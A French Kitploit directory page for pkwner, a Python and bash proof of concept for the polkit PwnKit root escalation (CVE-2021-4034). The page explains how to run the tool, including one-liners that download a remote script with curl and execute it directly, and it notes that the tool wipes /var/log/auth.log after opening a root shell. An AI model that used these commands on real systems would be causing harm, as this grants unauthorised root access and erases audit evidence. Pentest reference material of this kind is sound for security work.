Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pkwner — Un PoC en python3 et bash pour CVE-2021-4034 par Kim Schulz | Kitploit
Outils/GitHubGitHub/kimusan/pkwner
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubkimusan/pkwner

pkwner

Un PoC en python3 et bash pour CVE-2021-4034 par Kim Schulz

Voir le dépôt
2376il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Un PoC en Python3 et en BASH pour CVE-2021-4034 par Kim Schulz

Introduction

Ceci est un PoC simple pour l'erreur Polkit récemment découverte nommée PwnKit.

Je l'ai réalisé à la fois en script bash et en script python3 — juste pour le plaisir.

Le problème est très simple à exploiter mais a des conséquences énormes car il permet facilement d'obtenir un accès root sur la plupart des machines Linux où l'attaquant dispose d'un accès utilisateur local.

Comment l'exécuter

Ces scripts sont à exécution unique, il suffit donc de faire

root@kitploit:~
python3 pkwner.py

ou

root@kitploit:~
bash pkwner.sh

Vous pouvez également l'exécuter directement depuis un serveur web (par exemple ce dépôt GitHub) via :

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

ou

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

Dans les deux cas, cela devrait ressembler à ceci : alt text et alt text

Le script créera certains fichiers et dossiers mais fera le ménage après lui-même une fois le shell root ouvert — il nettoiera même le fichier /var/log/auth.log (et pourquoi pas).

Crédits

  • Qualys pour avoir découvert le problème et rendu l'information publique
  • Andris Raugulis pour avoir créé l'un des premiers PoC dont s'inspirer
  • MiscGang parce que misgang@Kalmarunionen sont des badass
Télécharger l’outil